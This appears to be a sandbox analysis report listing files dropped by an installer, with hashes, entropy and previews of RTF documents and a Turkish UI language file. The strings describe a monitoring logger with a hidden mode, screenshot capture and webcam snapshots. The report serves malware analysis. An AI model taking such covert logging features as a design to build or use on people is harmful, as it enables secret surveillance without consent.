                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 0
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):17081
                                                                                                                                                                                                                                                          Entropy (8bit):5.237330658373566
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:fd+wUQhflYfUg7EXwoXy5Pt/5k9bS+RnNMvjxYay:fVli88Pt/ObVNsxYay
                                                                                                                                                                                                                                                          MD5:665E034C26764DC99A3E8C8A9EDC54BB
                                                                                                                                                                                                                                                          SHA1:4CBF034140A28CF6BBF436C13D718E588DCA20BD
                                                                                                                                                                                                                                                          SHA-256:4E8BBFDEFB2414F62B84AB41831EBAC15E8D5571022B14FF697C6788D0A73068
                                                                                                                                                                                                                                                          SHA-512:DE73A62A6930B91563D67DC38F14549269285A75E9B0C36285E455AE85D4A2FD423CCBE0095A489AC795EB6D97210CE2FCEC25322CF6A1EDDD5EB9A2085741A2
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:[LngFile]..###############################################################################..####### Attention! Do Not change the key phrases left of sign "="! ############..###############################################################################..tbStart="Ba.la"..tbStartHint="G.nl.k tutmay. a."..tbStop="Durdur"..tbStopHint="G.nl.k tutmay. kapat"..tbFind="Bul"..tbFindHint="G.nl.k bilgisi ara"..tbSetting="Ayarlar"..tbSettingHint="Program ayarlar."..tbAbout="Hakk.nda"..tbAboutHint="Hakk.nda / kay.t bilgisi"..tbHomePage="Ana Sayfa"..tbHomePageHint="Program.n Ana Sayfas.na Git"..tbToday="Bug.n"..tbTodayHint="Bug.n.n g.nl...ne git"..tbHide="Gizle"..tbHideHint="Gizlilik modu (Sistem .ubu.unda hi. simge yok)"..tbMinimize="K...lt"..tbMinimizeHint="Simge Durumuna K...lt"..tbExit="..k"..tbExitHint="..k ve g.nl... durdur"..gbLog="Olay G.nl..."..tCurrLogSize="G.nl.k Boyutu (Mb)"..tCurrScrSize="Ekran Resmi Boyutu (Mb)"..tCurrSnpSize="Web Kameras.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):42288
                                                                                                                                                                                                                                                          Entropy (8bit):5.108390882492053
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:TLMrUuh04mIYKRXOYIX6tS+zdGA+ElGj/zdUIpeabvJ:T9B3dUIpeabvJ
                                                                                                                                                                                                                                                          MD5:97897027B8B5FE133581EA13A6EE7976
                                                                                                                                                                                                                                                          SHA1:614F116D74418D950D6E6D0989BF7249ED77721B
                                                                                                                                                                                                                                                          SHA-256:4E4734B0CE3DCFBAF08B4EBE18926E6AE6E63A50F0C4CB6D47452EACF9253F2D
                                                                                                                                                                                                                                                          SHA-512:00755B8B03BC8A83B36103E79C7FF62BA50816C4669A8CBBFADC4CD52E31037BE1ECD3CA93EC1A3B5D28363F54E49E3C91F461D6BB7664FA7D7327BEE75B9780
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1254\uc1\adeff0\deff0\stshfdbch0\stshfloch37\stshfhich37\stshfbi37\deflang1055\deflangfe1055\themelang1055\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset162\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset162\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset162\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset162\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \fswiss\fcharset162\fprq2{\*\panose 020f030202
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):37709
                                                                                                                                                                                                                                                          Entropy (8bit):5.097982097595037
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:0LMrCVmd0XKvpXnKnfmuh4jc0IXjFkjWrjfjOjWj3Q1/i6rGsqFwhR/MizFZKeBt:0LMrHuh4puRkAzKqLQ1l/zdUIpeabvr
                                                                                                                                                                                                                                                          MD5:B6940DC6E8FD337224A965573CCC6C96
                                                                                                                                                                                                                                                          SHA1:07F590E24341EA99AD71840F0ACE09FE7BDFD3D3
                                                                                                                                                                                                                                                          SHA-256:D6B44A01370E7516DE60CB797FB79D01BFD0A1734FA8EF227B7537A7676C29AE
                                                                                                                                                                                                                                                          SHA-512:CD3BC33236797086019006FFB4CFE5DDD3F796A1966A008832DDE0EC10DB6082D3ACAA2EFE5487EC419B89BA9A39B2B96309C639A4F3EA0F22FD505F4417A9D5
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1254\uc1\adeff0\deff0\stshfdbch0\stshfloch37\stshfhich37\stshfbi37\deflang1055\deflangfe1055\themelang1055\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset162\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset162\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset162\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \fswiss\fcharset162\fprq2{\*\panose 020f0302020204030204}Calibri Light;}{\fbimajor\f31503\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbminor
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):37812
                                                                                                                                                                                                                                                          Entropy (8bit):5.098588085153387
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:0LMrbpuhyiJXQIfR8+mo2VB/zdUIpeabva:08py5WdUIpeabva
                                                                                                                                                                                                                                                          MD5:32604687CD540ED2D4E66FEE8FB4A125
                                                                                                                                                                                                                                                          SHA1:29FE76F14A1D21DF0E2AF0DF2C84255E734C020D
                                                                                                                                                                                                                                                          SHA-256:8EAD5B5379FB2F98AFF59D49A2BD8224A93702CACA0DE228A65449A91DFD87DC
                                                                                                                                                                                                                                                          SHA-512:1C1B8F794DDB946B983A3193B5FD7DAC373EEE11CB5BA27FE8B0723B00C230971E6C722EBA5C52CAD1234AF41DD98FCFD0AAFBE1F44F474EFCDD59DCA3BBBC49
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1254\uc1\adeff0\deff0\stshfdbch0\stshfloch37\stshfhich37\stshfbi37\deflang1055\deflangfe1055\themelang1055\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset162\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset162\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset162\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \fswiss\fcharset162\fprq2{\*\panose 020f0302020204030204}Calibri Light;}{\fbimajor\f31503\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbminor
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):35217
                                                                                                                                                                                                                                                          Entropy (8bit):5.100503141917066
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:ZFRfkkIOxdWvXLV2NakmumYjucj+jaUysUredZjFjDfA7Leo75Y3k37pHYfjioJW:ZFRfAumYicq2BlMZB/A7yZo7IJJW
                                                                                                                                                                                                                                                          MD5:1456CC4187B4C904B65403612F948F8D
                                                                                                                                                                                                                                                          SHA1:D8636D6B2B0EDCB47001AD5D107643D66C4A0623
                                                                                                                                                                                                                                                          SHA-256:FE38EEF744F8B1E2D385BDB4487C795BBF4B74E6C4EF2B61201E4276C04F941E
                                                                                                                                                                                                                                                          SHA-512:CA7E563B3552F12DB33F6AAC2946AB7DC1AD83EA1726529A42C06F236AAEB896169FF4AFBC990AFC12473498C07584C3CA18B148F0184FB295C2DACA2482187B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff0\deff0\stshfdbch0\stshfloch37\stshfhich37\stshfbi37\deflang1049\deflangfe1049\themelang1055\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0302020204030204}Calibri Light;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbminor
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):66624
                                                                                                                                                                                                                                                          Entropy (8bit):5.059280595618483
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:ZFRfhqedVWGV79ka9aTwjjJ6jNxLUsQZZ6jNcLUsQZZ6jNdLUsQZZ6jNZLUsQZZB:ZJw+PLTJYsdhYX
                                                                                                                                                                                                                                                          MD5:6D34D466F1C68F15A6CC32AAE4E3E2D1
                                                                                                                                                                                                                                                          SHA1:3F4DCE2646758CEF37887EBE9772970420FF6C2E
                                                                                                                                                                                                                                                          SHA-256:92A2850CEC25C5578A53179E385BA1C32C3F41AAAEF0EC653FCCA133DA2DB5A7
                                                                                                                                                                                                                                                          SHA-512:B67C4678925D41CAAC364BF4C75F1F407AEC91915121EA6BE3AF0794C63001330BC775F06BFB1E9F49B42494AA856A6C0D66D6114D9D0CA9F0B53DABF77A9E8E
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff0\deff0\stshfdbch0\stshfloch37\stshfhich37\stshfbi37\deflang1049\deflangfe1049\themelang1055\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0302020204030204}Calibri Light;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbminor
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):35217
                                                                                                                                                                                                                                                          Entropy (8bit):5.100503141917066
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:ZFRfkkIOxdWvXLV2NakmumYjucj+jaUysUredZjFjDfA7Leo75Y3k37pHYfjioJW:ZFRfAumYicq2BlMZB/A7yZo7IJJW
                                                                                                                                                                                                                                                          MD5:1456CC4187B4C904B65403612F948F8D
                                                                                                                                                                                                                                                          SHA1:D8636D6B2B0EDCB47001AD5D107643D66C4A0623
                                                                                                                                                                                                                                                          SHA-256:FE38EEF744F8B1E2D385BDB4487C795BBF4B74E6C4EF2B61201E4276C04F941E
                                                                                                                                                                                                                                                          SHA-512:CA7E563B3552F12DB33F6AAC2946AB7DC1AD83EA1726529A42C06F236AAEB896169FF4AFBC990AFC12473498C07584C3CA18B148F0184FB295C2DACA2482187B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff0\deff0\stshfdbch0\stshfloch37\stshfhich37\stshfbi37\deflang1049\deflangfe1049\themelang1055\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0302020204030204}Calibri Light;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbminor
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):66624
                                                                                                                                                                                                                                                          Entropy (8bit):5.059280595618483
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:ZFRfhqedVWGV79ka9aTwjjJ6jNxLUsQZZ6jNcLUsQZZ6jNdLUsQZZ6jNZLUsQZZB:ZJw+PLTJYsdhYX
                                                                                                                                                                                                                                                          MD5:6D34D466F1C68F15A6CC32AAE4E3E2D1
                                                                                                                                                                                                                                                          SHA1:3F4DCE2646758CEF37887EBE9772970420FF6C2E
                                                                                                                                                                                                                                                          SHA-256:92A2850CEC25C5578A53179E385BA1C32C3F41AAAEF0EC653FCCA133DA2DB5A7
                                                                                                                                                                                                                                                          SHA-512:B67C4678925D41CAAC364BF4C75F1F407AEC91915121EA6BE3AF0794C63001330BC775F06BFB1E9F49B42494AA856A6C0D66D6114D9D0CA9F0B53DABF77A9E8E
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff0\deff0\stshfdbch0\stshfloch37\stshfhich37\stshfbi37\deflang1049\deflangfe1049\themelang1055\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0302020204030204}Calibri Light;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbminor
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):43564
                                                                                                                                                                                                                                                          Entropy (8bit):5.107218209627063
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:TLmrs4sAvnoBVFroAWBmho4cnTseRNoUCXap/z3OgwXG6Iu:TL4f3OgwXG6Iu
                                                                                                                                                                                                                                                          MD5:1D227690D1B4A573597374FEDFC0E5A9
                                                                                                                                                                                                                                                          SHA1:73BD11FEBB9219AD6FA0273AFF4B7440E594C3AA
                                                                                                                                                                                                                                                          SHA-256:D795CFADCCA7514424BD9A335CB14C4AB410225B7A2628982BC9A33851E4DB3C
                                                                                                                                                                                                                                                          SHA-512:BD589D52D6F12E9A02814C67DC52EBECC1EECBB3A686BBED7A25C9F65A8A1A7D5BF331DF61933CD0A4A383A80366867AA2890F371174F77FF4E4B153DD20ED17
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1254\uc1\adeff0\deff0\stshfdbch0\stshfloch37\stshfhich37\stshfbi37\deflang1055\deflangfe1055\themelang1055\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset162\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset162\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset162\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset162\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f39\fbidi \fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Ro
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):45800
                                                                                                                                                                                                                                                          Entropy (8bit):5.097060523282222
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:0LMrb5Ke8ctMRcPMRC90OmDcPMRC90Okj+yXpcrb+/z3OgwXG6IN:085ERZau3OgwXG6IN
                                                                                                                                                                                                                                                          MD5:BF226FC63E045046722D8F7D54D3CD48
                                                                                                                                                                                                                                                          SHA1:6134D8D56E0E9FADBCB931CD091513E69A766D33
                                                                                                                                                                                                                                                          SHA-256:1BC9F58D4EC025B08FF100A71397F11FDE77AFF49271545A7C91ABCECB95BD39
                                                                                                                                                                                                                                                          SHA-512:EAA01E5017FE5E9EB5C383C708F0229AFFE70E465D7460BDA475117BD56B12DC52669D59DFEADD28EB8B82696ECB48BF8F0F6BF13422D733FBD98EDD54E7A10B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1254\uc1\adeff0\deff0\stshfdbch0\stshfloch37\stshfhich37\stshfbi37\deflang1055\deflangfe1055\themelang1055\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset162\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset162\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset162\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \fswiss\fcharset162\fprq2{\*\panose 020f0302020204030204}Calibri Light;}{\fbimajor\f31503\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbminor
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):41095
                                                                                                                                                                                                                                                          Entropy (8bit):5.105004070141461
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:0LMrbpuh4puRkAzKqCV9mdecy46Xo/zdUIpeabve:08pxnmdq46IdUIpeabve
                                                                                                                                                                                                                                                          MD5:90E7A977D4DF30B041F323B8039EC7CF
                                                                                                                                                                                                                                                          SHA1:792587C64C654021CEBEC446E6DDB08A49D1B2DA
                                                                                                                                                                                                                                                          SHA-256:F7E70A032DFF7371ADB12C85526C4A5F75F8B4C381EAC028873B8DB8AC0F77B3
                                                                                                                                                                                                                                                          SHA-512:E35BB3A910EB4D5CB2249E3833A02C41153EB88B02C5FC949B4FFE7C0F6CF436F2BEB977670FF1155F89774C2499C15453A468D3A094DF6370C02C0954E291A1
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1254\uc1\adeff0\deff0\stshfdbch0\stshfloch37\stshfhich37\stshfbi37\deflang1055\deflangfe1055\themelang1055\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset162\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset162\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset162\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \fswiss\fcharset162\fprq2{\*\panose 020f0302020204030204}Calibri Light;}{\fbimajor\f31503\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbminor
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):43496
                                                                                                                                                                                                                                                          Entropy (8bit):5.1077571102439245
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:TLmrs4sAvnoBVFroAWBmho4cnTseRIMXyTsx/z3OgwXG6I2:TL4P3OgwXG6I2
                                                                                                                                                                                                                                                          MD5:FDD5D42614DC8C5255D6808F5FB9E756
                                                                                                                                                                                                                                                          SHA1:462F1BE33F4DE680C46F27A2732136F2A96EFB29
                                                                                                                                                                                                                                                          SHA-256:1615765F4CC8649F16975820F90F5FA6117F28CD97771021C8C8449B169B6DF7
                                                                                                                                                                                                                                                          SHA-512:46CD50DDBE274A62EC6E9D8650A71C16D4B213E56700CDB5FDE6BB880CC2096BD21934BADD8B27076313E9F57DAE468F431674B7D55D65C59C4B0DEA6922307B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
